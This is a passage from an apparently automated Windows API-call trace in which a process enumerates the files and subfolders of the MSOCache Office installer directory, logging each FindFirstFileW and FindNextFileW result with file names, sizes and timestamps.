dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.293] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.293] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf79111d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1200204, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="InfLR.cab", cAlternateFileName="")) returned 1 [0067.293] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.293] lstrlenW (lpString="InfLR.cab") returned 9 [0067.294] FindClose (in: hFindFile=0x5b9808 | out: hFindFile=0x5b9808) returned 1 [0067.294] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.294] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0054-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9EA85~1")) returned 1 [0067.294] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.294] lstrlenW (lpString="{90140000-0054-0409-1000-0000000FF1CE}-C") returned 40 [0067.295] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0054-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5b9808 [0067.295] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0x435769e0, ftCreationTime.dwHighDateTime=0x1d305eb, ftLastAccessTime.dwLowDateTime=0x43bdc500, ftLastAccessTime.dwHighDateTime=0x1d305eb, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.295] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.295] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x5f356eb0, ftCreationTime.dwHighDateTime=0x1cbe576, ftLastAccessTime.dwLowDateTime=0x5f356eb0, ftLastAccessTime.dwHighDateTime=0x1cbe576, ftLastWriteTime.dwLowDateTime=0x43bdc500, ftLastWriteTime.dwHighDateTime=0x1d305eb, nFileSizeHigh=0x0, nFileSizeLow=0x1861, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0067.295] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.295] lstrlenW (lpString="Setup.xml") returned 9 [0067.295] FindClose (in: hFindFile=0x5b9808 | out: hFindFile=0x5b9808) returned 1 [0067.296] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.296] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00A1-0409-1000-0000000FF1CE}-C", cAlternateFileName="{92572~1")) returned 1 [0067.296] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.296] lstrlenW (lpString="{90140000-00A1-0409-1000-0000000FF1CE}-C") returned 40 [0067.296] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00A1-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5b9808 [0067.298] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xf58ee8d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xf6e0ec10, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xf6e0ec10, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.299] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.299] FindNextFileW (in: hFindFile=0x5b9808, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xf5914a30, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x263400, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="OneNoteMUI.msi", cAlternateFileName="ONENOT~1.MSI")) returned 1 [0067.299] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.299] lstrlenW (lpString="OneNoteMUI.msi") returned 14 [0067.299] FindClose (in: hFindFile=0x5b9808 | out: hFindFile=0x5b9808) returned 1 [0067.300] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.300] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00B4-0409-1000-0000000FF1CE}-C", cAlternateFileName="{912E0~1")) returned 1 [0067.300] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.300] lstrlenW (lpString="{90140000-00B4-0409-1000-0000000FF1CE}-C") returned 40 [0067.300] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5a3f78 [0067.380] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xa5b30b20, ftCreationTime.dwHighDateTime=0x1d305f1, ftLastAccessTime.dwLowDateTime=0xa5bc90a0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xa5bc90a0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.403] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.403] FindNextFileW (in: hFindFile=0x5a3f78, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x308ae9f0, ftCreationTime.dwHighDateTime=0x1cbe56c, ftLastAccessTime.dwLowDateTime=0x308ae9f0, ftLastAccessTime.dwHighDateTime=0x1cbe56c, ftLastWriteTime.dwLowDateTime=0xa5b55ce0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x265400, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="ProjectMUI.msi", cAlternateFileName="PROJEC~1.MSI")) returned 1 [0067.403] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.423] lstrlenW (lpString="ProjectMUI.msi") returned 14 [0067.423] FindClose (in: hFindFile=0x5a3f78 | out: hFindFile=0x5a3f78) returned 1 [0067.424] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.424] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-00BA-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~4")) returned 1 [0067.424] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.424] lstrlenW (lpString="{90140000-00BA-0409-1000-0000000FF1CE}-C") returned 40 [0067.424] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5bae60 [0067.447] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xee38cbf0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xee803530, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.447] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.447] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee4bb7b0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x3e7e1f, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="GrooveLR.cab", cAlternateFileName="")) returned 1 [0067.447] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.448] lstrlenW (lpString="GrooveLR.cab") returned 12 [0067.468] FindClose (hFindFile=0x5bae60) [0067.468] FindClose (in: hFindFile=0x5bae60 | out: hFindFile=0x5bae60) returned 1 [0067.469] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.469] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0067.469] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.469] lstrlenW (lpString="{90140000-0115-0409-1000-0000000FF1CE}-C") returned 40 [0067.469] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5bae60 [0067.504] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.504] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.504] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="1033", cAlternateFileName="")) returned 1 [0067.504] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.505] lstrlenW (lpString="1033") returned 4 [0067.505] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\1033\\*", lpFindFileData=0x5bef08 | out: lpFindFileData=0x5bef08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5b9818 [0067.755] FindNextFileW (in: hFindFile=0x5b9818, lpFindFileData=0x5bef08 | out: lpFindFileData=0x5bef08*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xe8691090, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8691090, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0067.755] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.755] FindNextFileW (in: hFindFile=0x5b9818, lpFindFileData=0x5bef08 | out: lpFindFileData=0x5bef08*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x6a35700, ftCreationTime.dwHighDateTime=0x1cac9d7, ftLastAccessTime.dwLowDateTime=0x6a35700, ftLastAccessTime.dwHighDateTime=0x1cac9d7, ftLastWriteTime.dwLowDateTime=0xe8691090, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x1a588, dwReserved0=0x0, dwReserved1=0x0, cFileName="dwintl20.dll", cAlternateFileName="")) returned 1 [0067.755] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.755] lstrlenW (lpString="dwintl20.dll") returned 12 [0067.756] FindClose (in: hFindFile=0x5b9818 | out: hFindFile=0x5b9818) returned 1 [0067.756] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bef08 | out: hHeap=0x580000) returned 1 [0067.756] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x11e8ef00, ftCreationTime.dwHighDateTime=0x1cacdea, ftLastAccessTime.dwLowDateTime=0x11e8ef00, ftLastAccessTime.dwHighDateTime=0x1cacdea, ftLastWriteTime.dwLowDateTime=0xe84c60d0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x91975, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="branding.xml", cAlternateFileName="")) returned 1 [0067.756] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.756] lstrlenW (lpString="branding.xml") returned 12 [0067.756] FindClose (in: hFindFile=0x5bae60 | out: hFindFile=0x5bae60) returned 1 [0067.756] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.756] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{90140000-0117-0409-1000-0000000FF1CE}-C", cAlternateFileName="{9AFC7~1")) returned 1 [0067.756] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.756] lstrlenW (lpString="{90140000-0117-0409-1000-0000000FF1CE}-C") returned 40 [0067.756] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5bae60 [0067.765] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfa13c510, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc112b50, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc112b50, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.765] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.765] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="Access.en-us", cAlternateFileName="ACCESS~1.EN-")) returned 1 [0067.765] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.765] lstrlenW (lpString="Access.en-us") returned 12 [0067.765] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x5bf1f0 | out: lpFindFileData=0x5bf1f0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName=".", cAlternateFileName="")) returned 0x5c04d8 [0067.808] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5bf1f0 | out: lpFindFileData=0x5bf1f0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xfa2b92d0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xfc0c6890, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xfc0c6890, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="..", cAlternateFileName="")) returned 1 [0067.829] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.829] FindNextFileW (in: hFindFile=0x5c04d8, lpFindFileData=0x5bf1f0 | out: lpFindFileData=0x5bf1f0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3e02ab00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3e02ab00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa623330, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x266a00, dwReserved0=0x20006c, dwReserved1=0x730055, cFileName="AccessMUI.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0067.829] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.847] lstrlenW (lpString="AccessMUI.msi") returned 13 [0067.847] FindClose (in: hFindFile=0x5c04d8 | out: hFindFile=0x5c04d8) returned 1 [0067.847] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf1f0 | out: hHeap=0x580000) returned 1 [0067.848] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x3f33d800, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x3f33d800, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xfa160f00, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0xd4200, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="AccessMUISet.msi", cAlternateFileName="ACCESS~1.MSI")) returned 1 [0067.848] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.848] lstrlenW (lpString="AccessMUISet.msi") returned 16 [0067.848] FindClose (in: hFindFile=0x5bae60 | out: hFindFile=0x5bae60) returned 1 [0067.848] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5ba860 | out: hHeap=0x580000) returned 1 [0067.848] FindNextFileW (in: hFindFile=0x5a3f38, lpFindFileData=0x5b81f0 | out: lpFindFileData=0x5b81f0*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="{91140000-0011-0000-1000-0000000FF1CE}-C", cAlternateFileName="{91140~1")) returned 1 [0067.848] WaitForSingleObject (hHandle=0x90, dwMilliseconds=0x0) returned 0x102 [0067.848] lstrlenW (lpString="{91140000-0011-0000-1000-0000000FF1CE}-C") returned 40 [0067.848] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{91140000-0011-0000-1000-0000000FF1CE}-C\\*", lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName=".", cAlternateFileName="")) returned 0x5bae60 [0067.877] FindNextFileW (in: hFindFile=0x5bae60, lpFindFileData=0x5ba860 | out: lpFindFileData=0x5ba860*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xfe09ced0, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0x18179b90, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x18179b90, ftLastWriteTime.dwHighDateTime=0x1d301bf, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x73794d59, dwReserved1=0x79374468, cFileName="..", cAlternateFileName="")) returned 1 [0067.877] WaitForSingleObject 